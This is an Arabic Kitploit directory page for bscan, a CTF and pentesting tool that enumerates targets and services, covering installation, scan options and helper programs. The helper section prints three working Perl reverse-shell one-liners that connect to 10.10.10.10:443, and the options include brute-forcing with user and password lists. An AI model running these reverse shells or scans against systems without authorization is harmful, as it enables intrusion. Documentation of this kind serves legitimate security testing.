Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
bscan — أداة تعداد أهداف غير متزامنة | Kitploit
أدوات/GitHubGitHub/welchbj/bscan
الاستطلاعتخطيط الشبكةتوليد الحمولةمسح المنافذجمع المعلوماتCTFاختبار الاختراق
GitHubwelchbj/bscan

bscan

أداة تعداد أهداف غير متزامنة

عرض المستودع
25034منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

bscan

:mag: أداة تعداد أهداف غير متزامنة :mag_right:

travis status pypi built for kali linux python version


الملخص

bscan هي أداة سطر أوامر تستخدم لجمع المعلومات النشطة وتعداد الخدمات. في جوهرها، تقوم bscan بشكل غير متزامن بتشغيل عمليات لأدوات مسح معروفة، وتعيد استخدام نتائج المسح في مخرجات وحدة تحكم مظللة وهيكل دليل محدد جيدًا.

الترخيص

bscan مخصصة للأغراض التعليمية والأحداث مثل CTFs فقط، ولا يجب أبدًا تشغيلها على أجهزة و/أو شبكات دون موافقة مسبقة صريحة. تم إصدار هذا الكود بموجب رخصة MIT.

التثبيت

تمت كتابة bscan لتُشغّل على Kali Linux، ولكن لا يوجد ما يمنعها من العمل على أي نظام تشغيل مثبتة عليه الأدوات المناسبة. هناك عدة أنواع من الإصدارات المُحزمة وطرق لتثبيتها.

أسهل طريقة للبدء هي تثبيت الإصدار القابل للتنفيذ كملف واحد المناسب لنظام التشغيل الخاص بك (لا حاجة لتثبيت Python):

root@kitploit:~
# on Linux (i.e., Kali)
wget -O bscan https://releases.brianwel.ch/bscan/linux

# on Windows
powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; wget 'https://releases.brianwel.ch/bscan/windows' -OutFile 'bscan.exe'"

# to download a specific version, use the following pattern
wget -O bscan https://releases.brianwel.ch/github/bscan/linux/0.1.4

يمكنك أيضًا تنزيل أحدث إصدار مُحزم من PyPI (لاحظ أن هذا يتطلب تثبيت Python 3.6+ موجود مسبقًا):

root@kitploit:~
pip install bscan

وبالمثل، يمكنك الحصول على أحدث إصدار من التحكم في الإصدارات:

root@kitploit:~
pip install https://github.com/welchbj/bscan/archive/master.tar.gz

الاستخدام الأساسي

يحتوي bscan على مجموعة واسعة من خيارات التهيئة التي يمكن استخدامها لضبط عمليات المسح حسب احتياجاتك. إليك مثال سريع:

root@kitploit:~
$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org

ما الذي يحدث هنا؟

  • يعني --max-concurrency 3 أنه لن يتم تشغيل أكثر من 3 عمليات فرعية للمسح في وقت واحد
  • يحدد --patterns [Mm]icrosoft نمط تعبير منتظم مخصص لتظليل التطابقات في مخرجات المسح المُنشأة
  • يخبر --status-interval 10 أداة bscan بطباعة تحديثات حالة وقت التشغيل كل 10 ثوانٍ
  • يعني --verbose-status أن كلًا من تحديثات الحالة هذه سيقوم بطباعة تفاصيل جميع العمليات الفرعية للمسح الجاري تشغيلها
  • scanme.nmap.org هو المضيف الذي نريد تعداد خدماته

يعتمد bscan أيضًا على بعض ملفات التهيئة الإضافية. يمكن العثور على الملفات الافتراضية في دليل bscan/configuation وتخدم الأغراض التالية:

  • يحدد patterns.txt أنماط التعبير المنتظم التي سيتم تظليلها في مخرجات وحدة التحكم عند مطابقتها مع مخرجات المسح
  • يحدد required-programs.txt البرامج المثبتة التي تخطط bscan لاستخدامها
  • يحدد port-scans.toml عمليات مسح اكتشاف المنافذ التي سيتم تشغيلها على الهدف/الأهداف، بالإضافة إلى التعبيرات المنتظمة المستخدمة لاستخراج أرقام المنافذ وأسماء الخدمات من مخرجات المسح
  • يحدد service-scans.toml عمليات المسح التي سيتم تشغيلها على الهدف/الأهداف على أساس كل خدمة على حدة

الخيارات المفصلة

إليك ما يجب أن تراه عند تشغيل bscan --help:

root@kitploit:~
usage: bscan [OPTIONS] targets

 _
| |__  ___  ___ __ _ _ __
| '_ \/ __|/ __/ _` | '_ \
| |_) \__ \ (__ (_| | | | |
|_.__/|___/\___\__,_|_| |_|

an asynchronous service enumeration tool

positional arguments:
  targets               the targets and/or networks on which to perform enumeration

optional arguments:
  -h, --help            show this help message and exit
  --brute-pass-list F   filename of password list to use for brute-forcing
  --brute-user-list F   filename of user list to use for brute-forcing
  --cmd-print-width I   the maximum integer number of characters allowed when printing
                        the command used to spawn a running subprocess (defaults to 80)
  --config-dir D        the base directory from which to load the configuration files;
                        required configuration files missing from this directory will
                        instead be loaded from the default files shipped with this
                        program
  --hard                force overwrite of existing directories
  --max-concurrency I   maximum integer number of subprocesses permitted to be running
                        concurrently (defaults to 20)
  --no-program-check    disable checking the presence of required system programs
  --no-file-check       disable checking the presence of files such as configured
                        wordlists
  --no-service-scans    disable running scans on discovered services
  --output-dir D        the base directory in which to write output files
  --patterns [ [ ...]]  regex patterns to highlight in output text
  --ping-sweep          enable ping sweep filtering of hosts from a network range
                        before running more intensive scans
  --quick-only          whether to only run the quick scan (and not include the
                        thorough scan over all ports)
  --qs-method S         the method for performing the initial TCP port scan; must
                        correspond to a configured port scan
  --status-interval I   integer number of seconds to pause in between printing status
                        updates; a non-positive value disables updates (defaults to 30)
  --ts-method S         the method for performing the thorough TCP port scan; must
                        correspond to a configured port scan
  --udp                 whether to run UDP scans
  --udp-method S        the method for performing the UDP port scan; must correspond
                        to a configured port scan
  --verbose-status      whether to print verbose runtime status updates, based on
                        frequency specified by `--status-interval` flag
  --version             program version
  --web-word-list F     the wordlist to use for scans

الأدوات المساعدة

يتضمن برنامج bscan الرئيسي برنامجين مساعدين (bscan-wordlists و bscan-shells) لتسهيل حياتك عند البحث عن قوائم الكلمات ومحاولة فتح شيلات عكسية.

برنامج bscan-wordlists مصمم للعثور على ملفات قوائم الكلمات في Kali Linux. يبحث في عدة أدلة افتراضية ويسمح بمطابقة أسماء الملفات باستخدام النمط العام (glob). إليك مثال بسيط:

root@kitploit:~
$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt

جرب bscan-wordlists --help لاستكشاف خيارات أخرى.

برنامج bscan-shells يقوم بإنشاء مجموعة متنوعة من أوامر الشيل العكسية بخط واحد مع تعبئة حقلي target و port لك. إليك مثال بسيط لعرض جميع الشيلات المعتمدة على Perl، المهيأة للاتصال بـ 10.10.10.10 على المنفذ 443:

root@kitploit:~
$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

لاحظ أن bscan-shells يسحب هذه الأوامر من ملف التهيئة reverse-shells.toml. جرب bscan-shells --help لاستكشاف خيارات أخرى.

التطوير

ابدأ بإعداد بيئة تطوير جديدة وتثبيت المتطلبات (باستخدام virtualenvwrapper / virtualenvwrapper-win):

root@kitploit:~
# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev

# get the deps
pip install -r dev-requirements.txt

قم بفحص النمط والأنواع للمشروع (يتم تشغيلها أيضًا على Travis):

root@kitploit:~
flake8 . && mypy bscan

عندما يحين وقت حزمة إصدار جديد:

root@kitploit:~
# build the single-file executable
pyinstaller bscan.spec

# build source and wheel distributions
python setup.py bdist_wheel sdist

# run post-build checks
twine check dist/*

# upload to PyPI
twine upload dist/*
تنزيل الأداة